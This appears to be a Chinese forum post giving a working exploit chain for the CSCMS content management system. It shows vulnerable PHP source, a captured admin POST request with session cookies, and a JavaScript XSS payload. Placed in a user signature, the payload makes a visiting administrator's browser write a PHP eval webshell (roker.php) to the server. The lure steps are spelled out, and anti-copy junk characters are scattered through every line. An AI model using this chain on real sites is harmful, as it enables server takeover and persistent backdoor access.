|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题: ]: w5 R7 G' q. L3 w R
官网已经修补了,所以重新下了源码( ` }2 h0 z3 c1 t
因为 后台登入 还需要认证码 所以 注入就没看了。
a5 j3 I* y" T! ~& Q( d7 W存在 xss
9 F1 Z4 z# r, p& Q5 r; L漏洞文件 user/member/skin_edit.php
" X% T7 Y% X2 @' `0 a8 B本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:5 _ R* B8 @& @; q) S* w6 N
3 c. V5 m* F6 \" G</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
! ^ d; j( H6 r- _0 D6 [
, e Q [8 L: u& m; s) i2 \$ X</textarea></td></tr>6 c8 d0 a: T2 `0 z n
: \3 M; {( s- Y) V user/do.php # y, q: l% y9 |. s2 W! |* t
( T& ~4 o4 W! ^
/ u# }6 [4 i2 f; a: f0 q% K3 c
if($op=='zl'){ //资料
, k/ o8 _4 |1 W! t( d8 v* j F. S8 v
7 a: L5 E7 O$ ^, e9 {' f. ? if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
0 V% V1 U- g/ X: c4 x exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));! T' X4 x* `, Y) s& P# \; `
7 v4 f8 M5 R: s9 R4 ]( ~ $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
. `* B. d, x3 K" N7 m
: m1 I6 D$ O( ~! G# F CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'- J$ |5 m- e( ~4 F0 B
where CS_Name='".$cscms_name."'";
$ e& d$ [ s% p" v
: z, W1 Z5 t5 W f if($db->query($sql)){
4 C0 F0 F# u2 t( X7 I9 c , q) |% \6 B9 `8 O
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));6 z0 l$ M3 o3 ~" D# r& q/ Y
2 {0 L( _( ^: K+ n! d9 z# D$ @9 ~3 ?
}else{0 D, O# g/ G6 V \* y8 \
+ w) ^! w" O$ U4 q+ R9 U7 T: l' g
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
; h2 y H- q1 e9 i# z/ N5 H5 E 5 {; ~* D- M. H/ H7 f9 c
} F3 Q3 a. P/ {: ?4 n* e0 s
1 D }7 u$ h p. E8 E3 S g; ?
6 y- I9 P1 o4 W1 }没有 过滤导致xss产生。: y6 k9 K: p" g) p; a
后台 看了下 很奇葩的是可以写任意格式文件。。7 s; z, {/ t3 \ y, Y
抓包。。
! f& F7 ~9 M+ q) z9 e' c
; S- H$ C, D; V) V7 S" t) r. Y1 V5 b0 @2 U% v6 r* i1 I
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.13 {) j7 n) k0 y8 N
! k7 y& L; t8 J5 B2 }9 aAccept: text/html, application/xhtml+xml, */*
3 p# G$ Q$ K, o
% o0 F5 t s( i' YReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php( g" @7 I6 p2 d( a# I5 r9 o
& s; K! R2 N! I+ h
Accept-Language: zh-CN4 z4 `2 q. c( M& G! h% J x
; I0 K/ }2 @0 P1 KUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
e" P: T6 u- O; G 1 O' G9 b( K8 x6 m4 O, W! D
Content-Type: application/x-www-form-urlencoded
8 w0 c8 P& d) P& ` s
* m/ h Q d6 K. ~Accept-Encoding: gzip, deflate+ ~* G6 K2 o; {6 V, f' G! P# l. T
5 p. _+ M4 @, T4 z: ~
Host: 127.0.0.1
3 _% T! J5 ^3 f/ c
) \0 z% c: y. p/ b. h) j% {Content-Length: 38
9 Q" z1 R0 R, ]- a9 K' m
- C3 o2 j' h/ f7 l# R8 SDNT: 1
8 d/ e, t4 k, P, K) m! `% T ( E% h8 {- u0 k
Connection: Keep-Alive
$ R/ [2 e6 o. A5 P1 ]
2 Z% _& B, E4 i/ M# j- WCache-Control: no-cache" j7 r: O1 @! l
: \) }6 Z1 i$ S$ o2 d! B( C8 p; J
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594; ~8 V1 x" X. ?! I
; ]' z# `7 k/ O G6 Q# v1 w
: ~ u. l+ z/ R B: Gname=aaa.php&content=%3Cs%3E%3Ca%25%3E3 }$ N h6 @- G/ }% f" |
9 P1 K* b- q. T5 u- H9 t8 g: D
& F. \" Q( w9 R9 r" z- X" X/ n
# [7 W9 Z6 D, s于是 构造js如下。
* D5 }7 S# \3 ]3 C1 N9 b
) l$ b6 k, V$ J0 b' ]本帖隐藏的内容<script> 0 M. s- G+ |: x5 v- f" i7 X
thisTHost = top.location.hostname;
1 H, x& W% g( b
/ U0 Y( W. Z5 J9 h2 B- bthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/"; I* l' P5 c) ^7 H/ Z
; E+ H, W) e- Y1 Vfunction PostSubmit(url, data, msg) { 3 m; }5 a6 d7 o. h/ a
var postUrl = url;
% \/ s# L. T" B4 ]$ u/ {
: E8 U7 h. D6 ]% c var postData = data;
# G5 u$ I% Y; P6 Q1 P: B var msgData = msg;
! U% I: N) o) k! T& ^ @ var ExportForm = document.createElement("FORM"); * c5 x: K! W$ w
document.body.appendChild(ExportForm);
% J/ O% R h% k- n' ? ExportForm.method = "POST";
6 p" J: j. Q8 ` @ var newElement = document.createElement("input");
: z- k+ m0 _6 T9 @ newElement.setAttribute("name", "name");
) m6 |4 s& a6 W' M! S: j% G+ X9 i( O newElement.setAttribute("type", "hidden");
# l- ^( {% Q7 n. k2 n2 b+ } W var newElement2 = document.createElement("input");
& u+ ?' M: n" {9 B& p newElement2.setAttribute("name", "content"); ( \/ F- [* y7 w u
newElement2.setAttribute("type", "hidden");
) m, b% B% H; b# Y4 z0 V* j ExportForm.appendChild(newElement); ' }5 T2 }9 u/ V$ g- [ S7 g7 T- ` x A
ExportForm.appendChild(newElement2); 7 J% t4 f, V; }; [( ~6 ^
newElement.value = postData;
; `# P- |4 p& I. s$ M( d9 @ newElement2.value = msgData;
* [" m5 P# Z; J8 p ExportForm.action = postUrl; : T5 p2 L4 L* q, O7 j/ l" o
ExportForm.submit(); % f8 d$ E! {, w Z& H! m$ i
};
( h1 f1 _( K$ F) u0 d $ w7 N _* @) s' ?7 ~
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
2 K1 E# L$ b, O/ o. b% Y' T ; I" p, K+ K( I# h) I
</script>! `; B; H" I o5 D, z) \
! `% W. {& G$ m
+ }1 h' }% `) q$ [( o9 P5 r
) s% w, r6 v8 p; }http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
) B Q* o9 o5 M/ B$ ~" t8 x用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
# U! a$ M* F: L+ W; h5 Q就会 在 skins\index\html\目录下生成 roker.php 一句话。 | * Q, S$ o4 N7 W" w
|
|